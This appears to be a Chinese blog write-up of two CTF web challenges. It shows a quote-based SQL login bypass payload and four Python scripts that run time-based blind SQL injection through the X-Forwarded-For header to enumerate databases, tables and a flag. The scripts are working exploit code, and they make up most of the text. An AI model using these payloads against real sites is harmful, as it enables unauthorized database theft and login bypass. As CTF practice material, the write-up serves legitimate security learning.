可我浪费着我寒冷的年华

实验吧 web题writeup

1.http://ctf5.shiyanbar.com/web/wonderkun/web/index.html

用户名我输入:or'xor"and"select"union'

结果给我过滤成了:

可见该过滤的都过滤了,但是唯独单引号以及双引号都没过滤。这里就可以想到万能密码了。

猜想其sql语句为:select * from admin where username = ' ' and password = ' ';

可以那么写:

username: def' = '0

password :def' = '0

然后就组成了

select * from admin where username = 'def' = '0' and password = 'def' = '0';

def是我随意输入的一个字符所以肯定不是正确的密码,不是正确的密码就会返回false,而false等同于0。那么便会导致其sql语句成立进而绕过登陆。

 

2.http://ctf5.shiyanbar.com/web/wonderkun/index.php

看到IP,这里能想到的也就是x-forwarded-for IP伪造注入了。这里的注入实在搞了很久。  

爆裤

# -*- coding:utf-8 -*-  
import requests
import string 
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.lowercase+string.uppercase+string.digits+string.punctuation
database=[]

for database_number in range(0,100):        #假设爆破前100个库
    databasename=''
    for i in range(1,100):                  #爆破字符串长度,假设不超过100长度
        flag=0
        for str in guess:                   #爆破该位置的字符
            #print 'trying ',str
            headers = {"X-forwarded-for":"'+"+" (select case when (substring((select schema_name from information_schema.SCHEMATA limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(database_number,i,str)}
            try:
                res=requests.get(url,headers=headers,timeout=4)
            except:
                databasename+=str
                flag=1
                print '正在扫描第%d个数据库名,the databasename now is '%(database_number+1) ,databasename
                break
        if flag==0:
            break
    database.append(databasename)
    if i==1 and flag==0:
        print '扫描完成'
        break

for i in range(len(database)):
    print database[i]

爆表明

# -*- coding:utf-8 -*-  
import requests
import string 
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.lowercase+string.uppercase+string.digits+string.punctuation
database=[]

for table_number in range(0,500):   
    print 'trying',table_number
    headers = {"X-forwarded-for":"'+"+" (select case when (select count(table_name) from information_schema.TABLES ) ='%d' then sleep(5) else 1 end) and '1'='1"%(table_number)}
    try:
        res=requests.get(url,headers=headers,timeout=4)
    except:
        print table_number
        break

爆列名

# -*- coding:utf-8 -*-  
import requests
import string 
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.lowercase+string.uppercase+string.digits+string.punctuation
tables=[]

for table_number in range(41,42):           #假设从第60个开始
    tablename=''
    for i in range(1,100):                  #爆破字符串长度,假设不超过100长度
        flag=0
        for str in guess:                   #爆破该位置的字符
            headers = {"X-forwarded-for":"'+"+" (select case when (substring((select table_name from information_schema.TABLES limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(table_number,i,str)}
            try:
                res=requests.get(url,headers=headers,timeout=4)
            except:
                tablename+=str
                flag=1
                print '正在扫描第%d个数据库名,the tablename now is '%(table_number+1) ,tablename
                break
        if flag==0:
            break
    tables.append(tablename)
    if i==1 and flag==0:
        print '扫描完成'
        break

for i in range(len(tables)):
    print tables[i]

保出内容

#-*-coding:utf-8-*-
import requests
import string
url="http://xxx"
guess=string.lowercase + string.uppercase + string.digits
flag=""

for i in range(1,33):
   for str in guess:
     headers={"x-forwarded-for":"xx'+"+"(select case when (substring((select flag from flag ) from %d for 1 )='%s') then sleep(5) else 1 end ) and '1'='1" %(i,str)}
     try: 
         res=requests.get(url,headers=headers,timeout=4)
     except requests.exceptions.ReadTimeout, e:
         flag = flag + str
         print "flag:", flag
         break

print 'result:' + flag

//作者:Ovie
//链接:http://www.jianshu.com/p/5d34b3722128
//來源:简书
//著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

  

代码:http://blog.csdn.net/qq_35078631/article/details/54773769

 

posted @ 2017-10-16 01:21  珍惜少年时  阅读(457)  评论(0编辑  收藏  举报
可我浪费着我寒冷的年华